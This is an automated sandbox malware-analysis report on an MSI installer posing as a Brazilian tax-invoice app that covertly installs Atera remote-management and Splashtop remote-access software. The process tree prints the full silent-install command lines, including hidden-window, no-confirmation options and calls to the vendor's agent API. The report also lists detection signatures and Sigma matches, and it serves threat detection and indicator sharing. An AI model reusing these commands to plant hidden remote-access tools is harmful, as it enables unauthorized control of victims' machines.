Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
APLICATIVO-WINDOWS-NOTA-FISCAL.msi

Overview

General Information

Sample name:APLICATIVO-WINDOWS-NOTA-FISCAL.msi
Analysis ID:1584760
MD5:7ce6669643890d209540d68e76c0cfcc
SHA1:c49df2e823d5e2461a11c96ad4d36974c7fffc9a
SHA256:27f1cdf3422c4c87d9d273a62df4404339119e416d16d8512479d87acd07c12b
Tags:msiuser-Porcupine
Infos:

Detection

AteraAgent
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Installs Task Scheduler Managed Wrapper
Loading BitLocker PowerShell Module
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Potential PowerShell Command Line Obfuscation
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7644 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\APLICATIVO-WINDOWS-NOTA-FISCAL.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7688 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7764 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822D MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7800 cmdline: rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7856 cmdline: rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7948 cmdline: rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7452 cmdline: rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 8004 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 8044 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8084 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 8116 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AteraAgent.exe (PID: 8184 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412" MD5: 477293F80461713D51A98A24023D45E8)
    • msiexec.exe (PID: 4556 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 512046948B0983DC32EDE392DA99D036 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 5652 cmdline: rundll32.exe "C:\Windows\Installer\MSI5085.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6967703 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6044 cmdline: rundll32.exe "C:\Windows\Installer\MSI5885.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6969500 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
  • AteraAgent.exe (PID: 3652 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 4908 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MpCmdRun.exe (PID: 8096 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7344 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 3084 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7248 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7700 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7668 cmdline: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6912 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 416 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageSTRemote.exe (PID: 7568 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ MD5: 67FEF41237025021CD4F792E8C24E95A)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SplashtopStreamer.exe (PID: 7000 cmdline: "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1 MD5: 9CD6BA3AD27DAC967F073CBCAD88FEF9)
    • AgentPackageMonitoring.exe (PID: 8096 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000P2oAPIAZ MD5: 810F893E58861909B134FA72E3BC90CD)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AteraAgent.exe (PID: 3492 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 3992 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageUpgradeAgent.exe (PID: 8020 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ MD5: E9794F785780945D2DDE78520B9BB59F)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1900 cmdline: "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart MD5: E5DA170027542E25EDE42FC54C929077)
    • AgentPackageTicketing.exe (PID: 5768 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ MD5: 2EC1D28706B9713026E8C6814E231D7C)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageInternalPoller.exe (PID: 1784 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ MD5: 01807774F043028EC29982A62FA75941)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageProgramManagement.exe (PID: 3248 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ MD5: CB9890B01A396F64D702AD10F441003A)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageSystemTools.exe (PID: 1696 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ MD5: 5BB0687E2384644EA48F688D7E75377B)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMonitoring.exe (PID: 4048 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ MD5: 810F893E58861909B134FA72E3BC90CD)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sppsvc.exe (PID: 2792 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 396 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AgentPackageUpgradeAgent.exe (PID: 1340 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun MD5: E9794F785780945D2DDE78520B9BB59F)
    • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLogJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
    C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dllJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
      C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dllJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
        C:\Windows\Temp\~DFB6CCB0CC037A0B87.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
          C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dllJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
            Click to see the 85 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000002A.00000002.2783908899.000002203A1E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
              0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                0000000D.00000002.2294249455.0000021C41ED0000.00000004.00000020.00040000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                  00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                    0000001A.00000002.2900108892.00000216491EB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                      Click to see the 360 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      44.0.AgentPackageTicketing.exe.214714d0000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                        21.2.AgentPackageAgentInformation.exe.15e7d2e0000.1.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                          47.0.AgentPackageInternalPoller.exe.22b81dc0000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                            49.2.AgentPackageProgramManagement.exe.153fd170000.3.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                              20.0.AgentPackageAgentInformation.exe.2156b880000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                                Click to see the 14 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Potential PowerShell Command Line Obfuscation
                                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible ", CommandLine: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) {
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6912, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 416, ProcessName: cscript.exe
                                Sigma detected: Net.exe Execution
                                Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8004, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8044, ProcessName: net.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible ", CommandLine: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) {
                                Sigma detected: Stop Windows Service Via Net.EXE
                                Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8004, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8044, ProcessName: net.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k smphost, CommandLine: C:\Windows\System32\svchost.exe -k smphost, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k smphost, ProcessId: 396, ProcessName: svchost.exe

                                Suricata Signatures

